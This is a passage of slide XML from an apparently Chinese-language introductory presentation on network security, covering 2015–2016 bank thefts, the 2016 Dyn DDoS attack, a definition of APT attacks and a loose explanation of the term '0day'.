              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月的厄瓜多尔银行损失</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>万美元，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月的菲律宾银行，到今年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月孟加拉国央行曝出被盗窃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>万美元，随后第二家及第三家银行（也是最初受害者）被黑的消息被公开。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月菲律宾一家银行又被盗，这次他们又造成乌克兰银行上千万美元的损失</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12292" name="Picture 4" descr="https://pic4.zhimg.com/998909faee75184c27fa6ef72a99ec7b_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69037" y="1862328"/>
            <a:ext cx="2334032" cy="155602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文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6451498" y="1506728"/>
            <a:ext cx="4203802" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>美国 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务提供商 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dyn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>遭受大规模 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>21 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>日北京时间 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>19 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分，美国 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务提供商 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dyn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>遭受大规模 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击，导致诸多网站停止服务，最终影响了小半个美国互联网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>躺枪观众里边居然出现了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amazon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paypal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spotify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Airbnb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etsy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这些大户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12296" name="Picture 8" descr="C:\Users\Barry\AppData\Local\YNote\data\mengtao10@163.com\6a0be0e824a54438a1c8bfc4a1394f1c\640.jpe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94465" y="2104621"/>
            <a:ext cx="2714625" cy="1916256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12298" name="Picture 10" descr="http://img3.duitang.com/uploads/item/201603/21/20160321204653_MYRm2.jpe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151646" y="2136383"/>
            <a:ext cx="1799054" cy="1884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8279494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4" name="矩形 3"/>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0x02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网络安全面临的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1149133"/>
            <a:ext cx="1678665" cy="452432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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【1】APT</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攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1566491"/>
            <a:ext cx="9013825" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advanced Persistent Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高级持续性威胁。 利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击的原理相对于其他攻击形式更为高级和先进，其高级性主要体现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。在此收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>程中，此攻击会主动挖掘被攻击对象受信系统和应用程序的漏洞，利用这些漏洞组建攻击者所需的网络，并利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞进行攻击</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其特点：高度目的，高度隐蔽，高度突然，高度规模，高度危害，高度复杂，目标实体化等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13314" name="Picture 2" descr="http://img5.pcpop.com/ArticleImages/fnw/2016/1029/5ee929ad-fdfc-46c9-b816-9db79cd42e99.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50633" y="3534778"/>
            <a:ext cx="2176237" cy="130392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矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="3755363"/>
            <a:ext cx="3281668" cy="777457"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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那么何为</a:t>
            </a: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0day? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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不明</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>真</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相的吃瓜群众</a:t>
            </a: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a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"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9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="4974272"/>
            <a:ext cx="9146038" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无外乎破解的意思；最早的破解是专门针对软件的，叫做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WAREZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，后来才发展到游戏，音乐，影视等其他内容的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，早期的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表示在软件发行后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>小时内就出现破解版本，现在我们已经引申了这个含义，只要是在软件或者其他东西发布后，在最短时间内出现相关破解的，都可以叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是一个统称，所有的破解都可以叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13316" name="Picture 4" descr="http://imgsrc.baidu.com/forum/w=580/sign=0f23d678a5cc7cd9fa2d34d109002104/dee68f01a18b87d684f3668a010828381d30fde9.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023370" y="3557966"/>
            <a:ext cx="1855317" cy="13039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1860679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0x02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网络安全面临的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1264009"/>
            <a:ext cx="2165978" cy="417358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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【2】</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世界黑客组织</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1906966"/>
            <a:ext cx="9013825" cy="4770537"/>
          </a:xfrm>
